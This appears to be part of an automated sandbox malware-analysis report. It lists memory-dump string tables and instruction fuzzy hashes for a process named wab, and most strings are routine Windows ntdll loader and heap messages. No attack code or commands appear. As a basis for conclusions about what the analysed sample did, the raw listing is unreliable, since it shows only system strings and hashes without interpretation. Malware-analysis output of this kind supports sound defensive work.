                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                            Strings
                                                            • HEAP: , xrefs: 0367F8B7
                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 0367F8CC
                                                            • HEAP[%wZ]: , xrefs: 0367F8AA
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %$&$@
                                                            Strings
                                                            • TargetNtPath, xrefs: 036FB82F
                                                            • GlobalizationUserSettings, xrefs: 036FB834
                                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 036FB82A
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                            Strings
                                                            • HEAP: , xrefs: 0367E6B3
                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0367E6C6
                                                            • HEAP[%wZ]: , xrefs: 0367E6A6
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                            Strings
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 036982DE
                                                            • Failed to reallocate the system dirs string !, xrefs: 036982D7
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 036982E8
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 036DC1C5
                                                            • @, xrefs: 036DC1F1
                                                            • PreferredUILanguages, xrefs: 036DC212
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            Strings
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 036A4888
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 036A4899
                                                            • LdrpCheckRedirection, xrefs: 036A488F
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            Strings
                                                            • Actx , xrefs: 036533AC
                                                            • SXS: %s() passed the empty activation context data, xrefs: 036929FE
                                                            • RtlCreateActivationContext, xrefs: 036929F9
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                            Strings
                                                            • DLL "%wZ" has TLS information at %p, xrefs: 03691A40
                                                            • minkernel\ntdll\ldrtls.c, xrefs: 03691A51
                                                            • LdrpInitializeTls, xrefs: 03691A47
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                            Strings
                                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0366127B
                                                            • BuildLabEx, xrefs: 0366130F
                                                            • @, xrefs: 036612A5
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                            Strings
                                                            • Process initialization failed with status 0x%08lx, xrefs: 036A20F3
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 036A2104
                                                            • LdrpInitializationFailure, xrefs: 036A20FA
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            • API String ID: 48624451-232158463
                                                            • API ID:
                                                            • String ID: @$@
                                                            • API String ID: 0-149943524
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            • API ID:
                                                            • String ID: $$$
                                                            • API String ID: 0-233714265
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0362A2FB
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0362A309
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API String ID: 0-2876891731
                                                            • API ID:
                                                            • String ID: .Local\$@
                                                            • API String ID: 0-380025441
                                                            • API ID:
                                                            • String ID: MUI
                                                            • API String ID: 0-1339004836
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • API ID:
                                                            • String ID: GlobalTags
                                                            • API String ID: 0-1106856819
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • API ID:
                                                            • String ID: EXT-
                                                            • API String ID: 0-1948896318
                                                            • API ID:
                                                            • String ID: PreferredUILanguages
                                                            • API String ID: 0-1884656846
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            • API ID:
                                                            • String ID: verifier.dll
                                                            • API String ID: 0-3265496382
                                                            • API ID:
                                                            • String ID: kLsE
                                                            • API String ID: 0-3058123920
                                                            • API ID:
                                                            • String ID: Flst
                                                            • API String ID: 0-2374792617
                                                            • API ID:
                                                            • String ID: L4rwL4rw
                                                            • API String ID: 0-1810648253
                                                            • API ID:
                                                            • String ID: Actx
                                                            • API String ID: 0-89312691
                                                            • API ID:
                                                            • String ID: LdrCreateEnclave
                                                            • API String ID: 0-3262589265
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd0aca91535a3de2fb6ec22fa6ab767d5fa8c979a2c51b9d0ce6025d53e3befb
                                                            • Instruction ID: 7ff0867313c048b447ff8172ad41a7467c4b98128b3e7f2f49c7dfd3351b4084
                                                            • Opcode Fuzzy Hash: fd0aca91535a3de2fb6ec22fa6ab767d5fa8c979a2c51b9d0ce6025d53e3befb
                                                            • Instruction Fuzzy Hash: 1232BD76E01219DBCF24DFA8D990BAEBBB5FF48714F18012DE845AB381E7359911CB90
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc81f7e2bd094e0d6b681d490f5695893300be400fa568f5d9d8fe042d8c732a
                                                            • Instruction ID: 6286079664921a59d9d4520a875bd7a263e56da493742f41b6c03f1e5aa21fc6
                                                            • Opcode Fuzzy Hash: dc81f7e2bd094e0d6b681d490f5695893300be400fa568f5d9d8fe042d8c732a
                                                            • Instruction Fuzzy Hash: 75424B75E002598FDB24CF69C981BEDF7F9BF49300F188199E989AB242D7349985CF60
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18634d41c54a144cd444209a3dc7948f3fb16c4db22ea0fb017bf3db72533521
                                                            • Instruction ID: f0e7fe6dee8acc3d04957ed7daf4dd79364b794867722a592834503b88f2756e
                                                            • Opcode Fuzzy Hash: 18634d41c54a144cd444209a3dc7948f3fb16c4db22ea0fb017bf3db72533521
                                                            • Instruction Fuzzy Hash: 8022C235A012168FCB19CF58C590ABEF7B6FF8A304B28456DD856DB340DB34E946DB90
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7056fe054b75256a556789b0a6cb26b96d84b451a62eb5cfd92480cdd437ec8d
                                                            • Instruction ID: 73a765d3cfea34d78e73dd50a08ce4a4794cb43611b41bdf496fc801547b9bac
                                                            • Opcode Fuzzy Hash: 7056fe054b75256a556789b0a6cb26b96d84b451a62eb5cfd92480cdd437ec8d
                                                            • Instruction Fuzzy Hash: 34D1D376A007169BDF24DF68C990ABEB7A5FF44314F0C462DE916DB280EB34D961CB60
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23990944a1e3d0d51698403bcc0885c3e0e901f4c284884e671eeca3e5dda637
                                                            • Instruction ID: d80ddecd9a90af47908ccff53240c60bd92cac3995d0d149742906d576121cf4
                                                            • Opcode Fuzzy Hash: 23990944a1e3d0d51698403bcc0885c3e0e901f4c284884e671eeca3e5dda637
                                                            • Instruction Fuzzy Hash: B5C1D671E006169FDB25DF5AC940BBEFBB5EF48310F198269D865AB380DB74E941CB80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b10b40c4393744a4b709c0608359e88411d15b8a33e291d42c2531992c0b7b23
                                                            • Instruction ID: 25b5f3d7bfdfc36bbe813c929d90bcb957dc201ac162a5ea6407a91a50960c14
                                                            • Opcode Fuzzy Hash: b10b40c4393744a4b709c0608359e88411d15b8a33e291d42c2531992c0b7b23
                                                            • Instruction Fuzzy Hash: 65A13975940215AFEB12EF64CC91FAF7BB9AF4A750F050158FA00AF2A0D7759C50CBA8
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c70c70326c7a5bc2a8aa5f0089796fa7bf679f383a46852f5bc1a553a72eee33
                                                            • Instruction ID: c31b92e23a1810647c16c66f277aafc87e08d3cea66985a80c535cc0bdb52379
                                                            • Opcode Fuzzy Hash: c70c70326c7a5bc2a8aa5f0089796fa7bf679f383a46852f5bc1a553a72eee33
                                                            • Instruction Fuzzy Hash: 85C167741083408FD764DF18C994BABBBE4BF88304F49496DE9899B390D7B4E909CF92
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 443d90282c8a10204976ac236c6d2daecda6da17394f1f38a3b860dfe121c6cb
                                                            • Instruction ID: 6a251a145860f92ce44f0d3df7c5d16b0bed4627260ecc39120e12f03a9c5734
                                                            • Opcode Fuzzy Hash: 443d90282c8a10204976ac236c6d2daecda6da17394f1f38a3b860dfe121c6cb
                                                            • Instruction Fuzzy Hash: EFA1C271A05716DBEB24DF65C6907AAB7B9FF44354F04407EEA059B381EB34E812C790
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b604e018eb650f71ca33ea03141143c68589c49130db293f5a1e3c20f12a911
                                                            • Instruction ID: da6f4703a6fc4e6ad6b6259ad418e7c89bac0bff49777773f9348a9bc65d67de
                                                            • Opcode Fuzzy Hash: 3b604e018eb650f71ca33ea03141143c68589c49130db293f5a1e3c20f12a911
                                                            • Instruction Fuzzy Hash: 0091BE75E00615AFDB15CFACD894BAEBFB5AF49700F194169E610AB340D738ED018FA4
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9189202d430a037f230ce472d06a478d6c0fcda1b8f54c807dc3510cea4e6b9
                                                            • Instruction ID: ae698518ea648ee83b109b3edf3f60a430e09dfb00ae48b9e89a57513204dcc5
                                                            • Opcode Fuzzy Hash: b9189202d430a037f230ce472d06a478d6c0fcda1b8f54c807dc3510cea4e6b9
                                                            • Instruction Fuzzy Hash: 6E914577A006159BDB24EB58C540BBEB7F1EF8A724F084569EC059B381E736D902CB70
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e29ee4812654026ec996684631c6128a2178d9621f51ac7e2a68d4282b23b3b
                                                            • Instruction ID: 5d216f4717c8afc6f4abd1423641a55f942b447c67d51c1d88fb495c266999d2
                                                            • Opcode Fuzzy Hash: 4e29ee4812654026ec996684631c6128a2178d9621f51ac7e2a68d4282b23b3b
                                                            • Instruction Fuzzy Hash: 80B111756097408FD354CF28C580A6AFBE1BF89304F584A6EF899CB352D331E985CB96
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                            • Instruction ID: c316d30fd572f472ec3205b07872d89c2f10692148578ed378a9cba06b9f6f0e
                                                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                            • Instruction Fuzzy Hash: D5819D76E001198BDF14EF58C9807AEFBB2FF88308F19826ADC15BB345D6329945CB91
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fa57529d205fad66c0462594aed0c123504bf45b6c911a067d1f98a4311ddb2
                                                            • Instruction ID: a7108b3f7e599b6884c16e7b5eda05e228280d3f47fd11b8cd3068c3d788f463
                                                            • Opcode Fuzzy Hash: 2fa57529d205fad66c0462594aed0c123504bf45b6c911a067d1f98a4311ddb2
                                                            • Instruction Fuzzy Hash: 50817C75A00609AFDF25CFA9C980AEEBBFAFF48340F14442DE955A7210D731AD05CB60
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 506f5a166223d27181b5615313bcae21479166e298826c13509ff8aa5f60f6b2
                                                            • Instruction ID: db19eebee2cdc07d1baef11f4798fb200850cc81ec4298839e8e138380038374
                                                            • Opcode Fuzzy Hash: 506f5a166223d27181b5615313bcae21479166e298826c13509ff8aa5f60f6b2
                                                            • Instruction Fuzzy Hash: D571BDB6D04669DBCB25DF58C9907BEFBB5FF49704F18825AE842AB350D7349801CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ae4e1a9fc13c3fa8c33ca93b4514e15bbd84d395490ebd8a02042520abfa8a28
                                                            • Instruction ID: 768bfe0c2d74d8f9b0306a1e96faf0974f8edd5f43ede8cce1d2e213af679a2e
                                                            • Opcode Fuzzy Hash: ae4e1a9fc13c3fa8c33ca93b4514e15bbd84d395490ebd8a02042520abfa8a28
                                                            • Instruction Fuzzy Hash: 10711235A04241DFC311DF28C594B2AB7F5FF8A700F0889AAE899CB351DB38D846CB95
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction ID: 56545e7338e75f788b7e9d07e9cffb148bec35d1693635e42b52243d32c6958a
                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction Fuzzy Hash: BD715B75A00619AFCB10DFA9CA84AAEBBB9FF49700F144569E505EB250DB34EE01CF94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f2cc0ba906b6428cb66c39ea3b02d6b2c5bc2cbb7fd8bc90faf07a04937499f
                                                            • Instruction ID: 2a1ca56f073f1f8ac8107d65a2482a14d619dee6e1122f22b84ec600a759a4aa
                                                            • Opcode Fuzzy Hash: 4f2cc0ba906b6428cb66c39ea3b02d6b2c5bc2cbb7fd8bc90faf07a04937499f
                                                            • Instruction Fuzzy Hash: 7E71FF36240B01AFDB21DF18C954FAAB7F5EF44764F18882CE2568B2A0D775E984CF64
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bba3a7de09687be4374f55d1e86bbaad113d0c532afc52bc06e33c0ffa8d26cc
                                                            • Instruction ID: 619869fdc7d4db746f3a8e1c73eaea39473eaae7227c83b56a69c9a9292d7181
                                                            • Opcode Fuzzy Hash: bba3a7de09687be4374f55d1e86bbaad113d0c532afc52bc06e33c0ffa8d26cc
                                                            • Instruction Fuzzy Hash: DA817D75A01205DFCB09CFA8C590AAEBBF1FF49300F1981A9D859EB345D734EA45CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2962a157f53d8c104441f05ccce64bce8263abc06642b3719d46af6034feaead
                                                            • Instruction ID: e05516a138057bb012fd3dbb4a98199ac365a96e798b0f29942dc0126cd79c4f
                                                            • Opcode Fuzzy Hash: 2962a157f53d8c104441f05ccce64bce8263abc06642b3719d46af6034feaead
                                                            • Instruction Fuzzy Hash: 3061DDB5602715AFC715DF68C884BABBBE8FF88300F04461DF8698B340DB34A919CB95
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: baf453b58ae72049e900a1e67f13f83f402a502c99655e950c673db7325f912b
                                                            • Instruction ID: 64bd9c2ae7697a2242b2f41d3f31fb82d97bff649f959cb818f647048ae52521
                                                            • Opcode Fuzzy Hash: baf453b58ae72049e900a1e67f13f83f402a502c99655e950c673db7325f912b
                                                            • Instruction Fuzzy Hash: A3617575A00A159FDB18DF78C590AADFBB5FF89200F15816ED419A7301DB34A942CFD4
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 160e82bf148875a1367c578a24c4d92175dfc36df4f216782adcfa1ec3c8b3fe
                                                            • Instruction ID: 56e56665577c230785910fbef419fcc4503474df6009c425c2e9e40fb9c1af97
                                                            • Opcode Fuzzy Hash: 160e82bf148875a1367c578a24c4d92175dfc36df4f216782adcfa1ec3c8b3fe
                                                            • Instruction Fuzzy Hash: 4161F47620A742CFD711CF68C594B6AF7E0BF80704F18446CE8958B391EB79E80ACB95
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 673219d99554e60180069c25b8d615590531d51250cb8b042e402690fca02db2
                                                            • Instruction ID: eaecee21d8f301e99a42cb8c9987ea5faa86e2307a91edd9ed31cec3086a1f51
                                                            • Opcode Fuzzy Hash: 673219d99554e60180069c25b8d615590531d51250cb8b042e402690fca02db2
                                                            • Instruction Fuzzy Hash: 96217D362482569BCB26DF34E8911E5BBA5EF8332432C17BDD5C06B182DF25884BD781
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a1fd8ece5ecc1425dcc257e35b9cbf4f78c7b2f06a55fc5903845dc9bac5cfc
                                                            • Instruction ID: 2ebfc38485b3e8fd83284de07c6e9ab3372ea09e56faa1f0a0c00270c5ae4acf
                                                            • Opcode Fuzzy Hash: 3a1fd8ece5ecc1425dcc257e35b9cbf4f78c7b2f06a55fc5903845dc9bac5cfc
                                                            • Instruction Fuzzy Hash: 4431E479A01215EFDB15DF98CD40BAEF7B5EB49740F454168E400AB344D774ED05CBA8
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3c4298e55058d68525ef866fc4bb0b857d28c181f47ff643c8f1f2a5b8311843
                                                            • Instruction ID: 08e74854fc923cbd732c70aaac786c25c61b752002910066b8516be2fdb34baa
                                                            • Opcode Fuzzy Hash: 3c4298e55058d68525ef866fc4bb0b857d28c181f47ff643c8f1f2a5b8311843
                                                            • Instruction Fuzzy Hash: FA217876211B00DFC722EF68CA41F19B7F5FF08B08F18496CE0068B6A1C778A850CB48
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                            • Instruction ID: 307b0eb56dfc98e886c7326ef6a9ad173a198b1bd39fa553574a0b24ce91cd08
                                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                            • Instruction Fuzzy Hash: 52119D76601704BFD722DE94CD41F9ABBB8EB81754F140039FA059F290D671ED44CB65
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2be448436c11036948d1e4c16f6bdb0440f85ebc54442879ffca308eced1d11b
                                                            • Instruction ID: f71a280a5a97685838e9dc54599205203b5987d1823f86112439ee3fe9708a8d
                                                            • Opcode Fuzzy Hash: 2be448436c11036948d1e4c16f6bdb0440f85ebc54442879ffca308eced1d11b
                                                            • Instruction Fuzzy Hash: 64119436701E319BCB11CF49CAC4A6AFBE9AF5A750B1A406DED099F305D6B2D901CF90
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction ID: 4b26396e213c2dd1e509b596b3fc04f08b6ffb4a35f33fc345435453425455e6
